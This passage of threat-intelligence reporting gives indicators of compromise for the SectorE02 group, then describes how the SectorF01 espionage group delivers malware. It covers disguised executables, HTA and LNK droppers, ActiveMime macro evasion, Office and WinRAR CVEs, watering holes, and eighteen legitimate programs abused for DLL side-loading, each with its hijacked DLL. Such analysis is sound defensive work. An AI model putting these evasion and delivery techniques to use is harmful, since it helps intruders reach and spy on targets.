While the use of a modular framework is not a new concept, we see that the SectorE02 group’s continuous remaking of their YTY framework plugins which serve the same purpose allows them to keep detections by security tools at a minimum. Based on their campaigns and the plugins we have seen, we believe they may be recreating each plugin on a per-campaign basis, meaning that each attack campaign might be targeting with new binaries coded from scratch and be hardly detected by security tools. At the same time, their newfound cautiousness in protecting their binaries from being downloaded and limited targeting means that the hardest part of detecting and responding to the SectorE02 group may be finding their related binaries in the first place.

Indicators of Compromise

Malicious Excel Files (SHA-256)

1f64ab4db42ad68b4b99120ef6e9d1409cf606d31d932c0d306bb11c8ddcb2b4
5a70d423fb336448fc7a71fbc3c7a4f0397bc7fa1ec32f7cc42824a432051c33
95ea070bbfca04fff58a7092d61527aad0474914ffd2501d96991faad1388c7a
fdcf3873df6f83336539c4997ce69fce459737c6d655f1972422f861437858a9
6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055
7703c3385894dd3468c468745c747bf5c75f37a9b1fcaf2a1d0f291ecb7abce6
aa1c8adc4b7d352e487842b1d3017f627230ff1057350aaca1ffeb4d6abae16a
a06a5b1d63ca67da90ba6cd9cbc00d6872707a1b49d44de26d6eb5ce7dd7d545
cc2c2694d0284153605a98c0e7493fb90aff0d78e7f03e37c80fb505fbf3f93f
6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055
42775c20aa5b73b2eaecb5b107ce59d105f978660e6e43f53f804733ce3f7cbe
f0c85a1c9cf80ad424acebbe7af54176d0cb778a639da2f2f59828af5bb79842

Dropped Batch Scripts (SHA-256)

92b12010772166647f510ad91731e931d58bc077bfc9f9d39adc678cc00fb65d
1b46735d6b6aebefd5809274de1aaa56b5fac314b33c2fa51b001e07b4f7e4d7
57a9a17baaf61de5cffa8b2e2ec340a179e7e1cd70e046cbd832655c44bc7c1d
cd03ed9e4f3257836e11016294c8701baa12414b59f221e556cbed16a946b205
ce1df70e96b4780329d393ff7a37513aec222030e80606ee3ef99b306951d74d
9169dab8579d49253f72439f7572e0aabeb685c5ca63bf91fff81502764e79bb

Dropped YTY Downloaders (SHA-256)

5acfd1b49ae86ef66b94a3e0209a2d2a3592c31b57ccbaa4bb9540fcf3403574
08b11f246e2ebcfc049f198c055fc855e0af1f8499ba18791e3232efa913b01a
62dfec7fe0025e8863c2252abb4ec1abdb4b916b76972910c6a47728bfb648a7
13f27543d03fd4bee3267bdc37300e578994f55edabc031de936ff476482ceb4
b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384
e726c07f3422aaee45187bae9edb1772146ccac50315264b86820db77b42b31c

YTY File Plugin

8fff7f07ebf0a1e0a4eabdcf57744739f39de643d831c36416b663bd243590e1
d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa

YTY Screenshot Plugin

f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5

YTY Keylogger Plugin

f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37

YTY File Exfiltration Uploader Plugin

d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e

IP Addresses

179[.]43[.]170[.]155
5[.]135[.]199[.]26

Domains

data-backup[.]online
servicejobs[.]life

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1107 File Deletion
T1158 Hidden Files and Directories
T1066 Indicator Removal from Tools
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1064 Scripting

Credential Access

T1056 Input Capture

Discovery

T1010 Application Window Discovery
T1083 File and Directory Discovery
T1082 System Information Discovery
T1497 Virtualization/Sandbox Evasion

Collection

T1119 Automated Collection
T1005 Data from Local System
T1039 Data from Network Shared Drive
T1025 Data from Removable Media
T1074 Data Staged
T1114 Email Collection
T1056 Input Capture
T1113 Screen Capture

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol

Exfiltration

T1020 Automated Exfiltration
T1041 Exfiltration Over Command and Control Channel

References

[1] Microsoft Docs | localtime, _localtime32, _localtime64
https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/localtime-localtime32-localtime64?view=vs-2019

The Growth of SectorF01 Group’s Cyber Espionage Activities

Abstract

Since 2013, there has been a hacking group receiving support from the national level which conducts cyber espionage campaigns against countries in the South China Sea. We refer to this group as SectorF01. From 2017, their activities have increased significantly. They mainly carry out these campaigns against government agencies and diplomatic, military, and research institutions in neighboring countries, and surveillance activities against opposing forces in their own countries.

In recent years, the SectorF01 group has been engaged in cyber espionage against various industries for its own benefit. They put extra focus on the automobile industry, and their targets countries have expanded to include South Korea and Japan as well, which are in the East Asian region. We decided to take a step-by-step look at more than 800 types of malware used by the SectorF01 group from 2013 until now (H1 2019). In this post, we will focus on the initial penetration methods that the SectorF01 group uses against their targets. We will see that they love using DLL side-loading.

Targets

Target Countries

The SectorF01 group conducts cyber espionage mainly in countries in Southeast Asia and East Asia. The victims are the countries around the South China Sea, and these countries belong to the Association of Southeast Asian Nations (ASEAN).

The SectorF01 group’s intensive attack targets are in the following countries:

• Vietnam
• China
• Cambodia
• Laos
• Thailand
• Myanmar
• Phillipines
• Malaysia
• Indonesia
• Singapore

Recently, they have also been expanding their cyber espionage activities to the following countries in East Asia:

• Japan
• South Korea

Targets of the SectorF01 group

The ellipses marked with red dotted lines are the range of countries targeted by the SectorF01 group, and the dark red ellipses are the range of countries where the attack is more concentrated. The ellipses, marked with orange dotted lines, are a range of countries that have recently been included in the attack target as the SectorF01 group expands their activities.

Target Industries

The SectorF01 group conduct cyber espionage activities against various fields as follows:

• Vietnamese dissidents, journalists, and activists
• ASEAN-related organizations
• Government institutions
• Diplomatic institutions
• Military institutions
• Marine-related organizations : Maritime organizations, marine research institutes, shipping companies, etc
• Scientific research institutes
• Universities and educational institutions
• Foreign companies in Vietnam
• Automotive Industry

Statistics for Cyber Espionage Activities in SectorF01 Group

The SectorF01 group has seen steady annual grown since its inception as a cyber espionage player in 2013 and has become one of the most influential threat actor groups in Southeast Asia. We created statistics about their activities through the more than 800 malware executables that the SectorF01 group used to attack.

About 800 malwares used in the statistics are all Windows executables. Polymorphic binaries which are executed by sandboxes and whose file hashes change each time they are run are excluded from these statistics, so only the initial file is included. We are excluding such polymorphic binaries which are not used in attacks to minimize statistical errors and misinterpretation.

This is a graph aggregating the number of malwares used in attacks by the SectorF01 group every year. It can be seen that the number of malware that they use each year is steadily increasing.

The Growth of the SectorF01 group’s Malware

The following are the statistics for the time and day when the SectorF01 group created the malware. We have analyzed about seven years of cyber espionage activity of the SectorF01 group and have concluded that they are highly likely to be threat actor groups sponsored by the Vietnamese government. We created statistics on compile times with the timestamp of about 500 binaries, after excluding those considered to have modified timestamps among the 800 binaries.

Assuming that the SectorF01 group is active in Vietnam, we set the time zone to “UTC+7″(Vietnam time zone) and created statistics based on that. Considering that the business hours in Vietnam are mainly from 8:00 am to 5:00 pm, about 68% of the malwares were created in Vietnam business hours. Also, binaries were rarely created at lunch time.

SectorF01 Group’s Malware Compile Time (UTC+7)

Next, we created statistics for the days when the SectorF01 group created binaries. The SectorF01 group made binaries on weekdays rather than weekends. About 86% of malware were made on weekdays. Among them, most binaries were produced on Mondays.

The days of the week that the SectorF01 group compiled their binaries

SectorF01 Groups’s Initial Access Tactics

The SectorF01 group uses a variety of methods for initial penetration. They mainly use malware delivered to the target via email attachments and at other times, infect specific targets that access websites via watering hole attacks. Here we describe the various initial penetration methods they have used.

Spearphishing Attachment & Spearphishing Link

The SectorF01 group usually delivers their malware through email attachments or links. The definition of these techniques can be found in the MITRE ATT&CK Framework.

“Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.”
MITRE ATT&CK – T1193, Spearphishing Attachment


“Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.”
MITRE ATT&CK – T1192, Spearphishing Link


Below, we can see the various ways malware is sent through attachments or links in emails used by the SectorF01 group.

Delivery Method 1: How Executable Files are Delivered

(1.1) Executable file disguised as normal document file

The SectorF01 group uses a executable that masquerades as a normal document file, such as a Word or PDF document, etc., causing the user to mistake the document file for execution. They change the icon of the file to the icon of the document program or add a document file extension such as “.doc” or “.pdf” before the “.exe” executable file extension. This causes the user to mistake the file as a document file. These executables are usually compressed and delivered in the form of email attachments.

(1.2) Malware disguised as normal program

The SectorF01 group changes the malware file name to be a file name of a normal program such as a web browser installation file (Firefox, Chrome), or an Adobe Flash web browser plug-in installation file. In addition, malware was distributed by disguising as a normal program used only in the target country.

Malware disguised as normal program installation file

(1.3) Malware using the “Space after Filename” technique

The SectorF01 group uses the “Space after Filename” technique to make the executable look like a normal document file. Inserting the document file extension, such as “.doc”, “.docx”, before the “.exe” extension, and inserting many spaces in the middle. Depending on the size of the filename field, the long “.exe” extension will not be visible due to the long space, and the user might misunderstand the executable as a document file.

Executable file disguised as document file through “Space after Filename” technique

(1.4) Malware contained in RAR archive

The SectorF01 group mainly creates malware in the form of compressed archives for delivering malicious executable files or document files and delivers them to the attack target. The compression formats they have used in the past are RAR, ZIP, GZIP, though the SectorF01 group mainly uses the RAR compression format.

Malware included in RAR archive

(1.5) SFXZIP autorun compressed file malware

The SectorF01 group also uses SFX (self-extracting archive) autorun compression file malware. They utilize the WinRAR program’s ability to generate SFX compressed files to generate malware with the ZIP compression format rather than the RAR compression format.

SFX compressed file creation method of ZIP compression format using WinRAR program
ZIP compression format SFX compressed file type malware

(1.6) Malware distribution method using HTA

The SectorF01 group uses HTA to spread malware. HTA stands for Microsoft HTML Applications and uses the “.hta” extension. A typical HTA file is configured to be similar to a HTML file, but is run as a separate utility program called “mshta.exe”, not a web browser like Internet Explorer. The SectorF01 group spreads malware by including VBScript in the “.hta” file, and that VBScript works by dropping the embedded malware or downloading additional malware. The advantage here is that while VBScript has limited privileges in a web browser due to security controls, these security controls are bypassed when the VBScript is executed via a HTA file.

Malware delivered in the form of an HTA file
VBScript to generate malware contained in HTA file

(1.7) Malware distribution method using Shortcut (LNK)

The SectorF01 group uses shortcut (“.lnk”) files to spread malware. Such LNK files can execute commands. They set the LNK file to run VBScript code using the “mshta.exe” program. It is delivered to the target by disguising icons and extensions which look like word document files. If the target mistakes the LNK file for a document file and executes it, then the VBScript code is executed to download and execute an additional malware file from a server.

The following is a malicious LNK file used by the SectorF01 group:

Malware delivered in the form of an LNK file
Malicious LNK files to download and run additional malware

(1.8) Deliver malware download link using cloud service

The SectorF01 group uses Amazon’s AWS S3 and Dropbox cloud storage services to upload malware, and that link is delivered via email.

Delivery Method 2: How malware is executed using macros

(2.1) Attacks using macros contained in a document

The SectorF01 group mainly delivers word documents containing macros to the target. The filename of the document is set to be something the target might be interested in and they attach the document to their email. The victim will not be infected if the malicious macro does not run, so the document body contains a social engineering technique to encourage the user to activate the macro.

Malicious Word document file with macros
Malicious macros contained in Word documents

(2.2) Attacks that convert macros to ActiveMime form

Word document files containing traditional malicious macros are more easily detected by security solutions such as antivirus and anti-spam filters. To bypass this, the SectorF01 group also uses the ActiveMime format. ActiveMime is an undocumented Microsoft file format that encodes macros in Microsoft Office. When you convert a Microsoft Office document that contains a macro to the “.mht (Microsoft Web Archive)” format, the macro is included in the “.mht” file in ActiveMime format. These converted macros can bypass security solutions because they can be detected only by analyzing the ActiveMime format.

The SectorF01 group changed the extension of the malicious document which was converted to “.mht” file format to the “.doc” extension and attached it to the email and delivered it to the target.

MHT malware with ActiveMime masquerading as a DOC file
ActiveMime format with malicious macros
A screen Run Word document file containing macro converted to ActiveMime

Delivery Method 3: Deploy malware using vulnerabilities

The SectorF01 group exploits vulnerabilities that are frequently used. These exploits are already used by many attackers, so it can mask the attacker’s characteristics to some extent.

(3.1) CVE-2017-0199

The CVE-2017-0199 vulnerability is a vulnerability that occurs because Microsoft Office programs does not properly handle OLE objects. A malicious file such as HTA (HTML Application) can be downloaded and executed from a remote server through a vulnerability that occurs when MS Office processes URL Moniker object.

The SectorF01 group used the CVE-2017-0199 vulnerability to deliver an RTF document containing a malicious OLE2link object to the target. The OLE2link object downloads the VBScript HTA file containing the Powershell command to run.

(3.2) CVE-2017-8570

The CVE-2017-8570 vulnerability is a vulnerability that occurs because Microsoft Office programs can not properly handle OLE objects. This vulnerability exists in the way MS Office handles Composite Moniker objects and can execute SCT (Windows Script Component) scripts included in OLE packages.

The SectorF01 group uses the CVE-2017-8570 vulnerability to deliver an RTF document containing a malicious “.sct” file that generates malware to the target.

Malicious documents using CVE-2017-8570 vulnerability

(3.3) CVE-2017-11882

The CVE-2017-11882 vulnerability is a vulnerability that occurs when the Equation Editor (EQNEDT32.EXE), a component of the MS Office program, fails to properly handle certain objects. While MS Office is processing certain objects in memory, it can execute arbitrary code through the vulnerability.

The SectorF01 group attacked by delivering a malicious RTF document with shellcode for generating malware using the CVE-2017-11882 vulnerability to the target.

Malicious documents using CVE-2017-11882 vulnerability
CVE-2017-11882 Vulnerability Code

(3.4) CVE-2018-20250

The CVE-2018-20250 vulnerability occurs in UNACEV2.dll, which is included in the compression program WinRAR. This is a vulnerability that can generate a file in a specific path by manipulating the file name field in the processing of ACE compression format. This allows an attacker to create an executable file in a path where the file can be executed automatically at system boot time, such as a “startup program”.

As many threat actor groups began to use the CVE-2018-20250 vulnerability, the SectorF01 group also did the same.

Malware using CVE-2018-20250 vulnerability

Delivery Method 4: Drive-by Compromise (Watering Hole)

The SectorF01 group infects targets that access legitimate sites by inserting malicious scripts into the normal website after hacking it in order to steal account information or to infect malware. This attack is known as Drive-by Compromise. Attackers choose websites that are frequently visited by specific targets rather than indiscreet website hacking, and this attack is also called a watering hole attack.

“A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is targeted for exploitation.”
MITRE ATT&CK – T1189, Drive-by Compromise


The SectorF01 group targeted specific individuals or organizations by attacking websites that were primarily visited by key personnel and activists who opposed the Vietnamese government. They have also attacked websites of government, diplomacy, defense and research areas of Vietnam, including Cambodia, China, Laos and the Philippines, and hacked ASEAN-related websites.

The following is the timing of the large-scale watering hole attacks by the SectorF01 group:

• May 2014, September 2014
• January 2015, March 2015
• May 2017
• September 2018, December 2018
• January 2019

When a target accesses a specific web site, the attacker distributes malware disguised as a web browser program or a plug-in, or displays a fake login page for collecting credential data. They also created domains similar to a normal website or online services and malicious scripts were inserted into fake domain websites to collect information about their targets.

TOO MUCH LOVE for DLL Side-Loading

The SectorF01 group prefers the “DLL Side-Loading” technique to execute their malware. DLL side-loading technique is also called “DLL Hijacking”, “DLL Preloading”, and “DLL Planting”. The MITRE ATT&CK Framework defines “DLL Side-Loading” as follows.

“Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.”
Definition of DLL Side-Loading


When DLLs are loaded in Windows OS, the order of searching is as follows:

1. The directory from which the application loaded.
2. The current directory.
3. The system directory. Use the GetSystemDirectory function to get the path of this directory.
4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
Dynamic-Link Library Search Order


Because the DLL file is in the same directory path as the executable file, that DLL is loaded as it has the load highest priority. The SectorF01 group distributes the legitimate file and the malicious DLL file together so that they are in the same path. This will load the malicious DLLs together when the normal file is executed.

This will make it seem as though it is a DLL file being loaded by a legitimate program and this can bypass detection of an endpoint security solution that performs behavior-based detection.

The SectorF01 group has distributed MS Windows OS files or popular programs with DLLs to load their malicious DLL files. In some cases, the legitimate files of famous anti-virus software are also used to load malicious DLLs.

The SectorF01 group loves the “DLL Side-Loading” technique so much that they abused many legitimate programs. We wondered how many normal programs were exploited, so we summarized all the normal programs we found.

The normal program files used by the SectorF01 group for “DLL Side Loading” are as follows:

• Microsoft Office Word (WINWORD.EXE)
• Windows Search (SearchIndexer.exe)
• Windows Search (SearchProtocolHost.exe)
• Google Update (GoogleUpdate.exe)
• Adobe AcroTranscoder (AcroTranscoder.exe)
• Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)
• Adobe Acrobat 3D Utility (A3DUtility.exe)
• WeChat (WeChat.exe)
• Coc Coc Browser Update (CocCocUpdate.exe)
• 360安全浏览器 (360 Secure Browser) (360se.exe)
• 60软件管家 (360 Software Manager) (SoftManager.exe)
• Neuber Software Typograf font manager (FontSets.exe)
• McAfee VirusScan On-Demand Scan (mcods.exe)
• McAfee Oem Module (mcoemcpy.exe)
• Symantec Network Access Control (rastlsc.exe)
• Kaspersky Anti-Virus Installation assistant host (avpia.exe)
• Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)
• Avast Antivirus remediation (wsc_proxy.exe)

They used major programs from Microsoft, Google and Adobe, and used popular local programs such as WeChat, Coc Coc Browser, and 360 Secure Browser. They also used programs from anti-virus vendors such as McAfee, Symantec, Kaspersky, and Avast.

Side Load 1 – Microsoft Office Word (WINWORD.EXE)

The SectorF01 group used the normal “WINWORD.EXE” file from “Microsoft Office Word” to utilize the “DLL Side-Loading” technique. The normal “WINWORD.EXE” file loads a “wwlib.dll” DLL file.

The normal “WINWORD.EXE” file sequentially searches the following paths to check if it exists in order to load the “wwlib.dll”.

The file “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe” file has a filename related to the topic that the target may be interested in. This is the normal file “WINWORD.EXE” with only the name changed.

They set the file name of their malicious DLL to be “wwlib.dll” and deploy it in the same path along with the renamed normal “WINWORD.EXE” file. When the victim executes this renamed “WINWORD.EXE”, the malicious “wwlib.dll” file is loaded and malware is executed.

The following shows the code in “WINWORD.EXE” that loads the “wwlib.dll” exported “FMain”.

The malicious DLL “wwlib.dll” is loaded and calls the Export function “FMain”.

The “FMain” of the malicious DLL “wwlib.dll” contains the malicious code.

Side Load 2 – Windows Search (SearchIndexer.exe)

The SectorF01 group used the normal “SearchIndexer.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchIndexer.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchIndexer.exe” file. When the victim executes this renamed “SearchIndexer.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchIndexer.exe” loading the “msfte.dll”.

Side Load 3 – Windows Search (SearchProtocolHost.exe)

The SectorF01 group used the normal “SearchProtocolHost.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchProtocolHost.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchProtocolHost.exe” file. When the victim executes this renamed “SearchProtocolHost.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchProtocolHost.exe” loading the “msfte.dll”.

Side Load 4 – Google Update (GoogleUpdate.exe)

The SectorF01 group used the normal “GoogleUpdate.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “GoogleUpdate.exe” file loads a “goopdate.dll” DLL file.

They set the file name of their malicious DLL to be “goopdate.dll” and deploy it in the same path along with the renamed normal “GoogleUpdate.exe” file. When the victim executes this renamed “GoogleUpdate.exe”, the malicious “goopdate.dll” file is loaded and malware is executed.

Side Load 5 – Adobe AcroTranscoder (AcroTranscoder.exe)

The SectorF01 group used the normal “AcroTranscoder.exe” file from AcroTranscoder software to utilize the “DLL Side-Loading” technique.

The normal “AcroTranscoder.exe” file loads a “Flash Video Extension.dll” DLL file.

The following is a malicious word document “FW Report on demonstration of former CNRP in Republic of Korea.doc” used by the SectorF01 group.

When this document is executed, the malicious DLL “Flash Video Extension.dll” and the renamed legitimate “AcroTranscoder.exe” are deployed in the same path. When the normal “AcroTranscoder.exe” is executed, the malicious “Flash Video Extension.dll” file is loaded and malware is executed.

The malicious DLL “Flash Video Extension.dll” is loaded and calls the Export API functions. The SectorF01 group put their malicious code in the “FLVCore :: Uninitialize” function, while all other functions point to the same address as the “FLVCore :: Uninitialize” function. Thus, as long as any Export API of the “Flash Video Extension.dll” is called, the malware is executed.

The “FLVCore :: Uninitialize” export function of the malicious DLL “Flash Video Extension.dll” contains code that performs malicious actions.

Side Load 6 – Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)

The SectorF01 group used the normal “FlashPlayerApp.exe” (Adobe Flash Player Control Panel Applet software) to utilize the “DLL Side-Loading” technique. The normal “FlashPlayerApp.exe” file loads a “UxTheme.dll” DLL file.

They set the file name of their malicious DLL to be “UxTheme.dll” and deploy it in the same path along with the renamed normal “FlashPlayerApp.exe” file. When the victim executes this renamed “FlashPlayerApp.exe”, the malicious “UxTheme.dll” file is loaded and malware is executed.

Side Load 7 – Adobe Acrobat 3D Utility (A3DUtility.exe)

The SectorF01 group used the normal “A3DUtility.exe” (Adobe Acrobat 3D Utility software) to utilize the “DLL Side-Loading” technique. The normal “A3DUtility.exe” file loads DLLs such as a “BIB.dll” DLL file.

The SectorF01 group sets the name of their malicious DLLs to “ACE.dll”, “AGM.dll”, “CoolType.dll”, “MSVCP80.dll”, “MSVCR80.dll” in addition to “BIB.dll”. They distribute these files together with the renamed normal “A3DUtility.exe” in the same path. These different DLL files are all loaded by the normal “A3DUtility.exe”.

The following shows the code in “A3DUtility.exe” loading the “AGM.dll”, “BIB.dll”, “CoolType.dll”, and so on.

“BIB.dll” is loaded and the Export API function is called. The malicious code of the SectorF01 group is inserted into the “BIB_12” function, and all other function addresses point to the “BIB_12” function address. This allows their malware to work no matter what Export API in “BIB.dll” is called. The other malicious DLLs are configured in the same way.

The exported functions of “BIB.dll”

The “BIB_12” function in “BIB.dll” contains the malicious code.

When the normal “A3DUtility.exe” is executed, the malicious DLL files is loaded and malware is executed.

Side Load 8 – WeChat (WeChat.exe)

The SectorF01 group used the normal “WeChat.EXE” (WeChat software) to utilize the “DLL Side-Loading” technique. The normal “WeChat.EXE” file loads a “WeChatWin.dll” DLL file.

WeChat is a famous Chinese messenger program.

They set the file name of their malicious DLL to be “WeChatWin.dll” and deploy it in the same path along with the renamed normal “WeChat.exe” file. When the victim executes this renamed “WeChat.exe”, the malicious “WeChatWin.dll” file is loaded and malware is executed.

Side Load 9 – Coc Coc Browser Update (CocCocUpdate.exe)

The SectorF01 group used the normal “CocCocUpdate.exe” (Coc Coc Browser Update Software) to utilize the “DLL Side-Loading” technique. The normal “CocCocUpdate.exe” file loads a “coccocpdate.dll” DLL file.

“Coc Coc Browser” is a famous web browser in Vietnam.

The following shows the code in “CocCocUpdate.exe” that loads the “coccocpdate.dll” “DllEntry” function.

They set the file name of their malicious DLL to be “coccocpdate.dll” and deploy it in the same path along with the renamed normal “CocCocUpdate.exe” file. When the victim executes this renamed “CocCocUpdate.exe”, the malicious “coccocpdate.dll” file is loaded and malware is executed.

The “DllEntry” function in “coccocpdate.dll” contains the malicious code.

Side Load 10 – 360安全浏览器 (360 Secure Browser) (360se.exe)

The SectorF01 group used the normal “360se.exe” (360安全浏览器 – 360 Secure Browser) to utilize the “DLL Side-Loading” technique. The normal “360se.exe” file loads a “chrome_elf.dll” DLL file.

“360安全浏览器(360 Secure Browser)” is a famous web browser in China.

The following shows the code in “360se.exe” that loads the “chrome_elf.dll” “SignalInitializeCrashReporting” Export API function.

They set the file name of their malicious DLL to be “chrome_elf.dll” and deploy it in the same path along with the renamed normal “360se.exe” file. When the victim executes this renamed “360se.exe”, the malicious “chrome_elf.dll” file is loaded and malware is executed.

“chrome_elf.dll” is loaded and the Export API function “SignalInitializeCrashReporting” is called.

The “SignalInitializeCrashReporting” function in “chrome_elf.dll” contains the malicious code.

Side Load 11 – 360软件管家 (360 Software Manager) (SoftManager.exe)

The SectorF01 group used the normal “SoftManager.exe” (360软件管家 – 360 Software Manager) to utilize the “DLL Side-Loading” technique. The normal “SoftManager.exe” file loads a “dbghelp.dll” DLL file.

“360软件管家(360 Software Manager)” is a famous software management program in China.

They set the file name of their malicious DLL to be “dbghelp.dll” and deploy it in the same path along with the renamed normal “SoftManager.exe” file. When the victim executes this renamed “SoftManager.exe”, the malicious “dbghelp.dll” file is loaded and malware is executed.

Side Load 12 – Neuber Software Typograf font manager (FontSets.exe)

The SectorF01 group used the normal “FontSets.exe” (Neuber Software Typograf font manager) to utilize the “DLL Side-Loading” technique. The normal “FontSets.exe” file loads a “FaultRep.dll” DLL file.

“Neuber Software Typograf font manager” is a famous font management program.

“FontSets.exe” loads the “FaultRep.dll” file from the same path as the program executed according to the DLL load order of Windows DLLs, before the file is loaded from the Windows system folder.

The following shows the code in “FontSets.exe” that loads the “FaultRep.dll” DLL.

They set the file name of their malicious DLL to be “FaultRep.dll” and deploy it in the same path along with the renamed normal “FontSets.exe” file. When the victim executes this renamed “FontSets.exe”, the malicious “FaultRep.dll” file is loaded and malware is executed.

Side Load 13 – McAfee VirusScan On-Demand Scan (mcods.exe)

The SectorF01 group used the normal “mcods.exe” (McAfee VirusScan On-Demand Scan) to utilize the “DLL Side-Loading” technique. The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

The SectorF01 group utilized normal files of Anti-Virus programs and exploited the fact that these files are usually whitelisted by other security products and that their behavior might be exempted from monitoring.

The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

“McVsoCfg .dll” is loaded and the Export API function “McVsoCfgGetObject” is called. The “McVsoCfgGetObject” function in “McVsoCfg.dll” contains the malicious code.

They set the file name of their malicious DLL to be “McVsoCfg.dll” and deploy it in the same path along with the renamed normal “mcods.exe” file. When the victim executes this renamed “mcods.exe”, the malicious “McVsoCfg.dll” file is loaded and malware is executed.

Side Load 14 – McAfee Oem Module (mcoemcpy.exe)

The SectorF01 group used the normal “mcoemcpy.exe” (McAfee Oem Module) to utilize the “DLL Side-Loading” technique. The normal “mcoemcpy.exe” file loads a “McUtil.dll” DLL file.

They set the file name of their malicious DLL to be “McUtil.dll” and deploy it in the same path along with the renamed normal “mcoemcpy.exe” file. When the victim executes this renamed “mcoemcpy.exe”, the malicious “McUtil.dll” file is loaded and malware is executed.

Side Load 15 – Symantec Network Access Control (rastlsc.exe)

The SectorF01 group used the normal “rastlsc.exe” (Symantec Network Access Control) to utilize the “DLL Side-Loading” technique. The normal “rastlsc.exe” file loads a “RasTls.dll” DLL file.

They set the file name of their malicious DLL to be “RasTls.dll” and deploy it in the same path along with the renamed normal “rastlsc.exe” file. When the victim executes this renamed “rastlsc.exe”, the malicious “RasTls.dll” file is loaded and malware is executed.

Side Load 16 – Kaspersky Anti-Virus Installation assistant host (avpia.exe)

The SectorF01 group used the normal “avpia.exe” (Kaspersky Anti-Virus Installation Assistant host) to utilize the “DLL Side-Loading” technique. The normal “avpia.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “avpia.exe” file. When the victim executes this renamed “avpia.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 17 – Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)

The SectorF01 group used the normal “plugins-setup.exe” (Kaspersky Light Plugin Extension Registrar) to utilize the “DLL Side-Loading” technique. The normal “plugins-setup.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “plugins-setup.exe” file. When the victim executes this renamed “plugins-setup.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 18 – Avast Antivirus remediation (wsc_proxy.exe)

The SectorF01 group used the normal “wsc_proxy.exe” (Avast Antivirus remediation) to utilize the “DLL Side-Loading” technique. The normal “wsc_proxy” file loads a “wsc.dll” DLL file.

They set the file name of their malicious DLL to be “wsc.dll” and deploy it in the same path along with the renamed normal “wsc_proxy.exe” file. When the victim executes this renamed “wsc_proxy.exe”, the malicious “wsc.dll” file is loaded and malware is executed.

The lures related to South Korea

The SectorF01 group used more than 800 malwares for about seven years and used keywords related to various countries. We will summarize the attacks that contain keywords related to South Korea among those malwares. They mainly attacked countries in Southeast Asia; however, a Japanese automobile company, one of the East Asian countries, is likely to have been attacked by the SectorF01 group recently as well, and similar malware have been found at a similar time, which we suspect to be related to a South Korean automobile company.

We cannot be sure that this attack was carried out on South Korea just because it contained keywords related to South Korea. However, the SectorF01 group is using subjects related to South Korea in their attack, and it is possible that the attack was directly or indirectly related to South Korea. The SectorF01 group has carried out a number of attacks against foreign companies that have entered Vietnam, and so there is a possibility that South Korean companies may be targeted.

Lure 1 – Hyundai Thành Công

